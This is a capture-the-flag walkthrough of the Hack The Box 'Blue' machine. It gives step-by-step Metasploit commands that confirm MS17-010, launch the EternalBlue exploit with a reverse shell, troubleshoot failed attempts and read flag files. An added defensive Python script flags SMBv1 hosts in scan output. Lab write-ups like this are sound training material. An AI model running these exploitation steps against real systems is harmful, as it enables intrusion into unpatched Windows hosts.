I’ve just completed a walkthrough of the “Blue” machine on Hack The Box, which marks the end of the beginner track for me! If you’re following along, I’ve got the “Lame” machine walkthrough linked on my channel, so you can finish the whole track too.
Machine Name: HackTheBox Blue
Difficulty: Easy
Demonstrated Concept: Exploiting Windows through the EternalBlue vulnerability.
My Approach to the “Blue” Machine
1. Initial Reconnaissance (Nmap Scan)
I kicked things off with an Nmap scan to scout for open ports and services on the target machine.
- Command Used:
nmap -sV -sC [IP_ADDRESS]
The scan immediately highlighted several open ports, many of which were related to SMB (Server Message Block), specifically ports 135, 139, and 445. The Nmap results were quite telling: SMBv1 was enabled, and the target was running Windows 7 Professional Service Pack 1. This combination screamed “EternalBlue vulnerability” to me!
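The combination described above (445/tcp open, SMB answering over version 1, Windows 7 SP1) is also what a defender would look for in their own scan results. The following is an added example, not part of the original walkthrough: the sample scan text, the addresses, the `triage` function and the `LEGACY` list are constructed for illustration, and treating an smb-os-discovery answer as a sign of SMBv1 is an assumption of this example.

```python
import re

# Constructed sample of `nmap -sV -sC` normal output for two lab hosts (not real scan data).
SAMPLE = """\
Nmap scan report for 192.0.2.10
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds
Host script results:
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|_  Computer name: LAB-PC

Nmap scan report for 192.0.2.20
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.9
443/tcp open  https   nginx
"""

SMB_PORTS = {135, 139, 445}
# Illustrative list of out-of-support Windows names; extend it for your own estate.
LEGACY = ("Windows XP", "Windows Vista", "Windows 7", "Server 2003", "Server 2008")

def triage(nmap_text):
    """Return one finding dict per host that exposes 445/tcp."""
    findings = []
    for block in re.split(r"(?m)^Nmap scan report for ", nmap_text)[1:]:
        host = block.split()[0]
        ports = {int(p) for p in re.findall(r"(?m)^(\d+)/tcp\s+open\b", block)}
        if 445 not in ports:
            continue
        os_line = re.search(r"(?m)^\|\s+OS: (.+)$", block)
        os_name = os_line.group(1).strip() if os_line else None
        findings.append({
            "host": host,
            "smb_ports": sorted(ports & SMB_PORTS),
            "os": os_name,
            # Assumption: an smb-os-discovery answer means the host accepted SMBv1.
            "smbv1_suspected": os_name is not None,
            "legacy_os": bool(os_name) and any(n in os_name for n in LEGACY),
        })
    return findings

if __name__ == "__main__":
    for f in triage(SAMPLE):
        action = "verify MS17-010 patch, disable SMBv1" if f["smbv1_suspected"] else "review exposure"
        print(f["host"], f["smb_ports"], f["os"], "->", action)
```

A hit means the host needs its MS17-010 patch level checked and SMBv1 disabled; the scan output alone does not prove it is unpatched.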
2. Enumerating SMB with Metasploit 🔍
Even if I hadn’t known about EternalBlue, the logical next step after the Nmap scan would be to dig deeper into SMB. So, I fired up Metasploit.
I started by searching for SMB-related auxiliary modules:
- Command Used:
search name:smb type:auxiliary
I found a module that could check for the MS17-010 vulnerability (which EternalBlue exploits).
- Module Used:
auxiliary/admin/smb/ms17_010_command
- Commands Used:
use auxiliary/admin/smb/ms17_010_command
info
show options
set rhosts [IP_ADDRESS]
run
This initial check indicated that MS17-010 was likely exploitable. To confirm, I then used a more specific scanner module:
- Module Used:
auxiliary/scanner/smb/smb_ms17_010
- Commands Used:
use auxiliary/scanner/smb/smb_ms17_010
info
show options
set rhosts [IP_ADDRESS]
run
The output clearly confirmed: “Host is likely vulnerable to MS17-010.”
3. Exploiting with EternalBlue in Metasploit
With the vulnerability confirmed, it was time for the exploit. I searched for an exploit module:
- Command Used:
search type:exploit name:smb
Then, I selected the EternalBlue exploit module:
- Module Used:
exploit/windows/smb/ms17_010_eternalblue
- Commands Used:
use exploit/windows/smb/ms17_010_eternalblue
show options
set rhosts [IP_ADDRESS]
I also needed to set my local host IP for the reverse shell:
- Command Used to Check My IP:
ip a
- Command Used to Set Local Host:
set lhost [MY_IP_ADDRESS]
- Command Used to Run Exploit:
exploit
4. Troubleshooting the Exploit 🐛
The exploit didn’t work immediately. It connected and triggered the vulnerability but failed to establish a Meterpreter session, showing errors about “triggering free of corrupted buffer.” Even after Metasploit tried increasing “groom allocations,” it still failed.
I double-checked if the target machine was still online:
- Command Used:
ping [IP_ADDRESS]
(It was responsive).
Reviewing the module options, I realized I hadn’t explicitly set the target operating system.
- Command Used to Show Targets:
show targets
- Command Used to Set Target:
set target 1
(Target 1 was Windows 7).
- Command Used to Confirm Options:
show options
- Command Used to Rerun Exploit:
run
Even with the target set, the exploit continued to fail. The issue seemed to be “sending egg to corrupted connection.” My final troubleshooting step was to reset the target machine on Hack The Box.
5. Successful Exploitation and Post-Exploitation 🎉
After resetting the machine, I ran the exploit again (with lhost, rhosts, and target 1 all set).
- Command Used:
exploit
This time, success! I got a Meterpreter session. From there, I dropped into a command shell:
- Command Used:
shell
Finally, I navigated to find the user and root flags:
- Commands Used:
dir
cd Users
dir
(This showed “Administrator” and “harris” user directories)
cd harris
type user.txt
(To retrieve the user flag)
I knew the root flag would be in the Administrator’s directory, which I had already captured in a previous attempt.
And that’s how I compromised the “Blue” machine using the EternalBlue exploit! This officially wraps up the beginner track on Hack The Box for me, although I still need to submit one flag for “Lame” to hit 100% completion. I’m excited to see which track I’ll dive into next!